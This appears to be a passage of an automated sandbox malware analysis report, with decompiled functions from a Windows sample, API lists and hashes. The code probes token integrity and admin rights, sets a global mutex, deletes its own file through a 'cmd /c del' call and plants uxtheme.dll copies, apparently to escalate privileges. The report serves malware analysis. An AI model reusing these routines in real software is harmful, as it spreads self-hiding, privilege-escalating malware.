										__imp__CreateWellKnownSid(0x1a, 0, _t47, _t63 + 0x64);
										if(_t47 == 0) {
											L13:
											GetLastError();
										} else {
											_t51 = _t63 - 0x80;
											 *(_t63 + 0x6c) = 0;
											__imp__CheckTokenMembership( *(_t63 + 0x70), _t51, _t63 + 0x6c);
											if(_t51 == 0) {
												goto L13;
											} else {
												_t57 =  *(_t63 + 0x6c);
											}
										}
										CloseHandle( *(_t63 + 0x70));
										L16:
										CloseHandle( *(_t63 + 0x74));
										L18:
										_t32 = _t57;
									}
								}
							} else {
								L7:
								GetLastError();
								CloseHandle( *(_t63 + 0x74));
								goto L2;
							}
						}
					}
				} else {
					GetLastError();
					L2:
					_t32 = 0;
				}
				return _t32;
			}

0x00d329c7
0x00d329da
0x00d329e1
0x00d329ed
0x00d329f0
0x00d329f8
0x00d32a0b
0x00d32aeb
0x00d32a1b
0x00d32a21
0x00d32a33
0x00d32ae1
0x00000000
0x00d32a39
0x00d32a4e
0x00d32a51
0x00d32a55
0x00d32a72
0x00d32ad2
0x00d32ad8
0x00000000
0x00d32a74
0x00d32a83
0x00d32a8a
0x00000000
0x00d32a8c
0x00d32a90
0x00d32a97
0x00d32a9e
0x00d32aa6
0x00d32ac5
0x00d32ac5
0x00d32aa8
0x00d32aac
0x00d32ab3
0x00d32ab6
0x00d32abe
0x00000000
0x00d32ac0
0x00d32ac0
0x00d32ac0
0x00d32abe
0x00d32ace
0x00d32ada
0x00d32add
0x00d32ae7
0x00d32ae7
0x00d32ae7
0x00d32a8a
0x00d32a57
0x00d32a57
0x00d32a57
0x00d32a60
0x00000000
0x00d32a60
0x00d32a55
0x00d32a33
0x00d329fa
0x00d329fa
0x00d32a00
0x00d32a00
0x00d32a00
0x00d32af8

APIs

_memset.LIBCMT ref: 00D329E1
GetVersionExA.KERNEL32(?,?,?), ref: 00D329F0
GetLastError.KERNEL32(?,?), ref: 00D329FA
GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00D32A24
OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00D32A2B
GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00D32A51
GetLastError.KERNEL32(?,?), ref: 00D32A57
CloseHandle.KERNEL32(?), ref: 00D32A60
GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00D32A86
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?,?,?), ref: 00D32A9E
CheckTokenMembership.ADVAPI32(?,?,?,?,?), ref: 00D32AB6
GetLastError.KERNEL32(?,?), ref: 00D32AC5
CloseHandle.KERNEL32(?), ref: 00D32ACE
IsUserAnAdmin.SHELL32 ref: 00D32AD2
CloseHandle.KERNEL32(?), ref: 00D32ADD
GetLastError.KERNEL32(?,?), ref: 00D32AE1
IsUserAnAdmin.SHELL32 ref: 00D32AEB

Strings

rG>v, xrefs: 00D32A9E

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorLastToken$CloseHandle$AdminInformationProcessUser$CheckCreateCurrentKnownMembershipOpenVersionWell_memset
String ID: rG>v
API String ID: 3265022410-1829036858
Opcode ID: 0f6d42e78d4de839175190394cc57fb47a1ce715a59bf13acf9639b81b1e8dc8
Instruction ID: 7e838601590c2524cc8dc5a4ec026afe9e9cb4f2630cebf0a0ce3e1669b5a6de
Opcode Fuzzy Hash: 0f6d42e78d4de839175190394cc57fb47a1ce715a59bf13acf9639b81b1e8dc8
Instruction Fuzzy Hash: DC311276D4030AEBDB219FA1DD48AEE3BA8FB08351F144026FA11D2261EB30C849DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D3289C, Relevance: 24.1, APIs: 16, Instructions: 104
memoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D3289C() {
				intOrPtr _t23;
				int _t32;
				int _t39;
				long _t51;
				void* _t62;
				void* _t63;
				void* _t65;

				_t63 = _t65 - 0x70;
				_t51 =  *(_t63 + 0x7c);
				 *((intOrPtr*)(_t63 + 0x68)) = 0;
				 *(_t63 + 0x6c) = 0;
				if(_t51 == 0) {
					L17:
					_t23 = 0;
				} else {
					 *_t51 = 0;
					E00D33510(_t63 - 0x34, 0, 0x9c);
					 *(_t63 - 0x34) = 0x9c;
					if(GetVersionExA(_t63 - 0x34) != 0) {
						L3:
						if( *((intOrPtr*)(_t63 - 0x30)) < 6) {
							goto L17;
						} else {
							if(OpenProcessToken( *(_t63 + 0x78), 0x18, _t63 + 0x6c) == 0) {
								GetLastError();
							} else {
								 *(_t63 + 0x7c) = 0;
								_t32 = GetTokenInformation( *(_t63 + 0x6c), 0x19, 0, 0, _t63 + 0x7c); // executed
								if(_t32 != 0) {
									L13:
									GetLastError();
								} else {
									if(GetLastError() != 0x7a) {
										GetLastError();
									} else {
										_t62 = LocalAlloc(0x40,  *(_t63 + 0x7c));
										if(_t62 == 0) {
											goto L13;
										} else {
											_t39 = GetTokenInformation( *(_t63 + 0x6c), 0x19, _t62,  *(_t63 + 0x7c), _t63 + 0x7c); // executed
											if(_t39 == 0) {
												GetLastError();
											} else {
												 *_t51 =  *(GetSidSubAuthority( *_t62,  *(GetSidSubAuthorityCount( *_t62)) - 0x00000001 & 0x000000ff));
												 *((intOrPtr*)(_t63 + 0x68)) = 1;
											}
											LocalFree(_t62);
										}
									}
								}
								CloseHandle( *(_t63 + 0x6c));
							}
							_t23 =  *((intOrPtr*)(_t63 + 0x68));
						}
					} else {
						 *(_t63 - 0x34) = 0x94;
						if(GetVersionExA(_t63 - 0x34) == 0) {
							goto L17;
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}

0x00d3289d
0x00d328a8
0x00d328af
0x00d328b2
0x00d328b7
0x00d329ba
0x00d329ba
0x00d328bd
0x00d328c8
0x00d328ca
0x00d328d5
0x00d328e3
0x00d328fa
0x00d328fe
0x00000000
0x00d32904
0x00d32915
0x00d329af
0x00d3291b
0x00d32926
0x00d3292f
0x00d32933
0x00d3299e
0x00d3299e
0x00d32935
0x00d32940
0x00d3299a
0x00d32942
0x00d3294d
0x00d32951
0x00000000
0x00d32953
0x00d32960
0x00d32964
0x00d3298b
0x00d32966
0x00d32980
0x00d32982
0x00d32982
0x00d32992
0x00d32992
0x00d32951
0x00d32940
0x00d329a7
0x00d329a7
0x00d329b5
0x00d329b5
0x00d328e5
0x00d328e9
0x00d328f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00d328f4
0x00d328e3
0x00d329c3

APIs

_memset.LIBCMT ref: 00D328CA
GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00D328DF
GetVersionExA.KERNEL32(?), ref: 00D328F0
OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00D3290D
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D3292F
GetLastError.KERNEL32 ref: 00D3293B
LocalAlloc.KERNEL32(00000040,?), ref: 00D32947
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00D32960
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D32968
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D32978
GetLastError.KERNEL32 ref: 00D3298B
LocalFree.KERNEL32(00000000), ref: 00D32992
GetLastError.KERNEL32 ref: 00D3299A
GetLastError.KERNEL32 ref: 00D3299E
CloseHandle.KERNEL32(?), ref: 00D329A7
GetLastError.KERNEL32 ref: 00D329AF

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorLast$Token$AuthorityInformationLocalVersion$AllocCloseCountFreeHandleOpenProcess_memset
String ID:
API String ID: 1389885952-0
Opcode ID: 5ef7d453a55d31ab4f5b8f14c26cbfe8c80b67ac42c2121ecb3d6d931ad00c94
Instruction ID: aa62d39dcf24e6fb8688a136241fe80df1d82dfde61290e5263c8fa5ca21d099
Opcode Fuzzy Hash: 5ef7d453a55d31ab4f5b8f14c26cbfe8c80b67ac42c2121ecb3d6d931ad00c94
Instruction Fuzzy Hash: 5131397A94031AAFEB209FA5EC44BAE7BB9EF48351F240021F954D2220D7719945DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D321ED, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
stringprocessCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00D321ED() {
				char _v264;
				char _v524;
				long _t11;
				int _t22;

				_t11 = GetModuleFileNameA(0,  &_v264, 0x104);
				if(_t11 != 0) {
					_t11 = GetShortPathNameA( &_v264,  &_v264, 0x104); // executed
					if(_t11 != 0) {
						_push( &_v264);
						_push("/c del %s >> NUL");
						_push( &_v524);
						E00D33E87();
						_t11 = GetEnvironmentVariableA("ComSpec",  &_v264, 0x104);
						if(_t11 != 0) {
							lstrcatA( &_v264, " ");
							lstrcatA( &_v264,  &_v524);
							_t22 = WinExec( &_v264, 0); // executed
							return _t22;
						}
					}
				}
				return _t11;
			}

0x00d32206
0x00d3220e
0x00d32219
0x00d32221
0x00d32229
0x00d32230
0x00d32235
0x00d32236
0x00d3224b
0x00d32253
0x00d32267
0x00d32277
0x00d32282
0x00000000
0x00d32282
0x00d32253
0x00d32221
0x00d3228a

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,7622DAA3), ref: 00D32206
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00D32219
GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 00D3224B
lstrcatA.KERNEL32(?,00D311F0), ref: 00D32267
lstrcatA.KERNEL32(?,?), ref: 00D32277
WinExec.KERNEL32(?,00000000), ref: 00D32282

Strings

ComSpec, xrefs: 00D32246
/c del %s >> NUL, xrefs: 00D32230

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: Namelstrcat$EnvironmentExecFileModulePathShortVariable
String ID: /c del %s >> NUL$ComSpec
API String ID: 4034038632-4153267903
Opcode ID: 27252dba8271332a274d05ec303bf791cd136cc5da33642f51e42e948097d791
Instruction ID: 7b4b1cf393e06bac434f00170646d13468789680d353c4311961f061a1346156
Opcode Fuzzy Hash: 27252dba8271332a274d05ec303bf791cd136cc5da33642f51e42e948097d791
Instruction Fuzzy Hash: 7E01C4BAD003296BDB5097A0AD89FDB776C9B14741F040191BA45E2144DA70DBC48B71

Uniqueness

Uniqueness Score: -1.00%

Function 00D32291, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D32291(void* __eflags) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t7;
				void* _t10;
				void* _t12;

				_t12 = 0;
				E00D33510( &_v16, 0, 0xc);
				_t7 = E00D32604( &_v16, 0x1f0001); // executed
				if(_t7 != 0) {
					_t10 = CreateMutexA( &_v16, 0, "Global\\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}"); // executed
					_t12 = _t10;
					if(_t12 == 0) {
						GetLastError();
					}
				}
				return _t12;
			}

0x00d3229a
0x00d322a1
0x00d322b2
0x00d322b9
0x00d322c5
0x00d322cb
0x00d322cf
0x00d322d1
0x00d322d1
0x00d322cf
0x00d322db

APIs

_memset.LIBCMT ref: 00D322A1

Part of subcall function 00D32604: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D322B7,00000000,00000000,00000000), ref: 00D3262D
Part of subcall function 00D32604: _memset.LIBCMT ref: 00D32645
Part of subcall function 00D32604: SetEntriesInAclA.ADVAPI32(00000001,?,00000000,7622DAA3), ref: 00D32678
Part of subcall function 00D32604: LocalAlloc.KERNEL32(00000040,00000014), ref: 00D32690
Part of subcall function 00D32604: _memset.LIBCMT ref: 00D326A7
Part of subcall function 00D32604: InitializeSecurityDescriptor.ADVAPI32(00D322B7,00000001), ref: 00D326B4
Part of subcall function 00D32604: SetSecurityDescriptorDacl.ADVAPI32(00D322B7,00000001,7622DAA3,00000000), ref: 00D326CB
Part of subcall function 00D32604: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00D326EC
Part of subcall function 00D32604: GetProcAddress.KERNEL32(00000000), ref: 00D326F3
Part of subcall function 00D32604: LocalAlloc.KERNEL32(00000040,00000200), ref: 00D3270C
Part of subcall function 00D32604: InitializeAcl.ADVAPI32(00000000,00000200,00000002), ref: 00D32718
Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D32777
Part of subcall function 00D32604: LocalFree.KERNEL32(00000000), ref: 00D3277E
Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D32786
Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D327A3
Part of subcall function 00D32604: LocalFree.KERNEL32(00D322B7), ref: 00D327AC
Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D327B0
Part of subcall function 00D32604: LocalFree.KERNEL32(7622DAA3), ref: 00D327B9
Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D327BD
Part of subcall function 00D32604: FreeSid.ADVAPI32(00D322B7), ref: 00D327C6
Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D327CE

CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322C5
GetLastError.KERNEL32(?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322D1

Strings

Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}, xrefs: 00D322BB

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorLast$Local$Free$Initialize_memset$AllocDescriptorSecurity$AddressAllocateCreateDaclEntriesLibraryLoadMutexProc
String ID: Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}
API String ID: 875962283-4277701779
Opcode ID: 1debc29687204d8d5c40f24a5d58c632276bfd845a24a771b8e62869e4c86b7c
Instruction ID: 2503a77dca8f72f9fc0eea3ea445c53bb06f724e3a29ced8753a5fa058e1cc30
Opcode Fuzzy Hash: 1debc29687204d8d5c40f24a5d58c632276bfd845a24a771b8e62869e4c86b7c
Instruction Fuzzy Hash: 8BE06D7AE0132977CB20A3A16C0AD9B7B6CCB04790F000020BE01E2242EA64D644C2F4

Uniqueness

Uniqueness Score: -1.00%

Function 00D322DC, Relevance: 2.5, APIs: 2, Instructions: 18
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00D322DC(void* __eflags) {
				void* _t2;
				void* _t6;
				void* _t7;

				_t7 = 0; // executed
				_t2 = E00D32291(__eflags); // executed
				_t6 = _t2;
				if(_t6 != 0) {
					_t1 = GetLastError() - 0xb7; // -183
					asm("sbb esi, esi");
					_t7 =  ~_t1 + 1;
					CloseHandle(_t6);
				}
				return _t7;
			}

0x00d322de
0x00d322e0
0x00d322e5
0x00d322e9
0x00d322f1
0x00d322f9
0x00d322fc
0x00d322fd
0x00d322fd
0x00d32307

APIs

Part of subcall function 00D32291: _memset.LIBCMT ref: 00D322A1
Part of subcall function 00D32291: CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322C5
Part of subcall function 00D32291: GetLastError.KERNEL32(?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322D1

GetLastError.KERNEL32(00000000,7622DAA3,00D3232C,00000000), ref: 00D322EB
CloseHandle.KERNEL32(00000000), ref: 00D322FD

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleMutex_memset
String ID:
API String ID: 4044507352-0
Opcode ID: bae1cea1f710be6e6350f2a3098bab0256fb550beccbc7172ba36845b081baf2
Instruction ID: 8ae809df8858f6726c63d1e4a48d3c7f87cec0c69bb392cda06eadea0b78749f
Opcode Fuzzy Hash: bae1cea1f710be6e6350f2a3098bab0256fb550beccbc7172ba36845b081baf2
Instruction Fuzzy Hash: C6D0A736A04533CB8721276D6C0C59BBB34EFD1F617120115EC49E3110CB204C0346F5

Uniqueness

Uniqueness Score: -1.00%

Function 00D32481, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D32481() {

				if( *0xd35a14 == 0 &&  *0xd35a04 == 0 &&  *0xd35a10 == 0) {
					E00D321ED(); // executed
				}
				ExitProcess(0);
			}

0x00d32488
0x00d3249c
0x00d3249c
0x00d324a3

APIs

ExitProcess.KERNEL32 ref: 00D324A3

Part of subcall function 00D321ED: GetModuleFileNameA.KERNEL32(00000000,?,00000104,7622DAA3), ref: 00D32206
Part of subcall function 00D321ED: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00D32219
Part of subcall function 00D321ED: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 00D3224B
Part of subcall function 00D321ED: lstrcatA.KERNEL32(?,00D311F0), ref: 00D32267
Part of subcall function 00D321ED: lstrcatA.KERNEL32(?,?), ref: 00D32277
Part of subcall function 00D321ED: WinExec.KERNEL32(?,00000000), ref: 00D32282

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: Namelstrcat$EnvironmentExecExitFileModulePathProcessShortVariable
String ID:
API String ID: 2303897708-0
Opcode ID: da211f2a8ff1d1343f9d8b3bff0a9aac4d841d4bb5c82a8378f544673248be9a
Instruction ID: dbe5f413f77fb6c5f6ab2e96b05d39b547dc0d4960eaeb9102a166db0ccbd2a4
Opcode Fuzzy Hash: da211f2a8ff1d1343f9d8b3bff0a9aac4d841d4bb5c82a8378f544673248be9a
Instruction Fuzzy Hash: 8AD04C38C11764CFEBA09B50FE497343760FB30B36F085215D549956A587B416C4EA72

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D3259B, Relevance: 3.0, APIs: 2, Instructions: 18
fileCOMMON

C-Code - Quality: 100%

			E00D3259B(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				void* _t4;
				void* _t7;

				_t7 = 0;
				_t4 = FindFirstFileA(_a4,  &_v324);
				if(_t4 != 0xffffffff) {
					_t7 = 1;
					FindClose(_t4);
				}
				return _t7;
			}

0x00d325af
0x00d325b1
0x00d325ba
0x00d325bd
0x00d325be
0x00d325be
0x00d325c8

APIs

FindFirstFileA.KERNEL32(00D32DA5,?,00000104), ref: 00D325B1
FindClose.KERNEL32(00000000), ref: 00D325BE

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: de8d2d63487e2b41a61058fa48158cff4db7a0f924e82ea0d803e2babce30ed3
Instruction ID: f61f75cf25dba015e0aea4546918026107dd77363989484b4d9f032e73318884
Opcode Fuzzy Hash: de8d2d63487e2b41a61058fa48158cff4db7a0f924e82ea0d803e2babce30ed3
Instruction Fuzzy Hash: 72D0A7B69001347BC7152769AC08DEE766CDF09326F000221FE1AD11E0E334DB9A86F5

Uniqueness

Uniqueness Score: -1.00%

Function 00D33E80, Relevance: .0, Instructions: 2
COMMON

C-Code - Quality: 100%

			E00D33E80() {

				return  *[fs:0x30];
			}

0x00d33e86

Memory Dump Source

Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00D33143, Relevance: 61.5, APIs: 30, Strings: 5, Instructions: 279
fileclipboardregistryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00D33143(void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
				void* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				signed int _v32;
				struct HINSTANCE__* _v36;
				char _v296;
				char _v556;
				char _v816;
				char _v1076;
				char _v1336;
				char _v1596;
				struct HINSTANCE__* _t88;
				void* _t105;
				signed int _t125;
				void* _t130;
				long _t135;
				long _t162;
				void* _t174;
				void* _t182;
				intOrPtr* _t189;
				int _t190;
				void* _t194;
				void* _t195;
				void* _t196;

				_v28 = 0;
				_t88 = GetModuleHandleA(0);
				_v12 = 0;
				_v24 = 0;
				_v36 = _t88;
				GetSystemDirectoryA( &_v816, 0x104);
				E00D32194(_t194 + E00D320EC( &_v816) - 0x32c, "\\uxtheme.dll");
				GetTempPathA(0x104,  &_v296);
				E00D32194(_t194 + E00D320EC( &_v296) - 0x124, "\\uxtheme.dll");
				GetTempPathA(0x104,  &_v1076);
				_push(GetTickCount());
				_push("\\%.8x.tmp");
				_t105 = E00D33620( &_v1076);
				_pop(_t182);
				wsprintfA(_t194 + _t105 - 0x430, ??);
				_v32 = _v32 & 0x00000000;
				_t196 = _t195 + 0xc;
				_t189 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				if(_t189 != 0) {
					_push( &_v32);
					_push(GetCurrentProcess());
					if( *_t189() == 0 || _v32 == 0) {
						goto L4;
					} else {
						return 0;
					}
				}
				L4:
				_t190 = 0xc001;
				do {
					E00D320CE( &_v556, 0, 0x104);
					GetClipboardFormatNameA(_t190,  &_v556, 0x104);
					if(E00D320EC( &_v556) != 0) {
						if(E00D32104( &_v556,  &_v296) == 0) {
							_v12 = _t190 & 0x0000ffff;
							_v24 = 1;
						}
						_t174 = E00D33B50( &_v556, "\\uxtheme.dll");
						_pop(_t182);
						if(_t174 != 0) {
							_v12 = _t190 & 0x0000ffff;
						}
					}
					_t190 = _t190 + 1;
				} while (_t190 < 0xffff);
				if(_v12 == 0) {
					L38:
					return _v28;
				}
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				if(E00D3250C(_t182,  &_v816,  &_v8,  &_v16) == 0) {
					goto L38;
				}
				if(E00D32F02(_v8, _v16,  &_v1076, _a12) != 0) {
					if(_v24 != 0) {
						GetTempPathA(0x104,  &_v1336);
						_t162 = GetTickCount();
						wsprintfA(_t194 + E00D33620( &_v1336) - 0x534, "\\%.8x.tmp", _t162);
						_t196 = _t196 + 0xc;
						MoveFileA( &_v296,  &_v1336);
					}
					if(E00D324AA( &_v296, _v8, _v16) != 0) {
						_v20 = 1;
					}
				}
				_t125 = E00D324AA( &_v1076, _a4, _a8);
				if(_t125 == 0) {
					_v20 = _v20 & _t125;
				}
				LocalFree(_v8);
				if(_v20 != 0) {
					if(_v24 != 0) {
						L30:
						if(E00D327DD() == 0) {
							E00D330CD(0x55);
						} else {
							__imp__LockWorkStation();
						}
						_t130 = CreateEventA(0, 0, 0, "Global\\AtomFun");
						_a12 = _t130;
						if(_t130 != 0) {
							if(WaitForSingleObject(_t130, 0x2710) == 0) {
								_v28 = 1;
							}
							CloseHandle(_a12);
							GetTempPathA(0x104,  &_v1596);
							_t135 = GetTickCount();
							wsprintfA(_t194 + E00D33620( &_v1596) - 0x638, "\\%.8x.tmp", _t135);
							MoveFileA( &_v296,  &_v1596);
							CopyFileA( &_v816,  &_v296, 0);
						} else {
							L34:
							GetLastError();
						}
						goto L38;
					}
					if(E00D33065(_v36, _v12) == 0) {
						goto L38;
					}
					_a12 = 0xc001;
					while(1) {
						E00D320CE( &_v556, 0, 0x104);
						GetClipboardFormatNameA(_a12,  &_v556, 0x104);
						if(E00D320EC( &_v556) != 0 && E00D33B50( &_v556, "\\uxtheme.dll") != 0) {
							goto L38;
						}
						_a12 = _a12 + 1;
						if(_a12 < 0xffff) {
							continue;
						}
						_a12 = 0xc001;
						while(RegisterWindowMessageA( &_v296) != 0) {
							_a12 = _a12 + 1;
							if(_a12 < 0xffff) {
								continue;
							}
							goto L30;
						}
						goto L34;
					}
				}
			}

0x00d33158
0x00d3315b
0x00d3315d
0x00d33160
0x00d33163
0x00d33173
0x00d33192
0x00d331a5
0x00d331c0
0x00d331cd
0x00d331d5
0x00d331dc
0x00d331e2
0x00d331e7
0x00d331f0
0x00d331f6
0x00d331fa
0x00d33210
0x00d33214
0x00d33219
0x00d33220
0x00d33225
0x00000000
0x00d3322d
0x00000000
0x00d3322d
0x00d33225
0x00d33234
0x00d33234
0x00d33239
0x00d33243
0x00d33251
0x00d33265
0x00d3327c
0x00d33281
0x00d33284
0x00d33284
0x00d33297
0x00d3329d
0x00d332a0
0x00d332a5
0x00d332a5
0x00d332a0
0x00d332a8
0x00d332a9
0x00d332b7
0x00d334e5
0x00000000
0x00d334e5
0x00d332bd
0x00d332c0
0x00d332c3
0x00d332dc
0x00000000
0x00000000
0x00d332ff
0x00d33305
0x00d3330f
0x00d33311
0x00d33332
0x00d33338
0x00d33349
0x00d33349
0x00d3335f
0x00d33361
0x00d33361
0x00d3335f
0x00d33375
0x00d3337c
0x00d3337e
0x00d3337e
0x00d33384
0x00d3338e
0x00d33398
0x00d33434
0x00d3343b
0x00d33447
0x00d3343d
0x00d3343d
0x00d3343d
0x00d33456
0x00d3345c
0x00d33461
0x00d33479
0x00d3347b
0x00d3347b
0x00d33485
0x00d33493
0x00d33495
0x00d334b6
0x00d334cd
0x00d334df
0x00d33463
0x00d33463
0x00d33463
0x00d33463
0x00000000
0x00d33461
0x00d333ab
0x00000000
0x00000000
0x00d333b1
0x00d333b8
0x00d333c2
0x00d333d2
0x00d333e6
0x00000000
0x00000000
0x00d33403
0x00d3340d
0x00000000
0x00000000
0x00d3340f
0x00d33416
0x00d33428
0x00d33432
0x00000000
0x00000000
0x00000000
0x00d33432
0x00000000
0x00d33416
0x00d333b8

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,7622DAA3,00000000), ref: 00D3315B
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00D33173
GetTempPathA.KERNEL32(00000104,?), ref: 00D331A5
GetTempPathA.KERNEL32(00000104,?), ref: 00D331CD
GetTickCount.KERNEL32 ref: 00D331CF
_strlen.LIBCMT ref: 00D331E2
wsprintfA.USER32 ref: 00D331F0
GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00D33207
GetProcAddress.KERNEL32(00000000), ref: 00D3320A
GetCurrentProcess.KERNEL32(00000000), ref: 00D3321A

Part of subcall function 00D320CE: _memset.LIBCMT ref: 00D320E1

GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00D33251

Part of subcall function 00D3250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D32526
Part of subcall function 00D3250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00D31DD6,?,?,?,?,?), ref: 00D32536
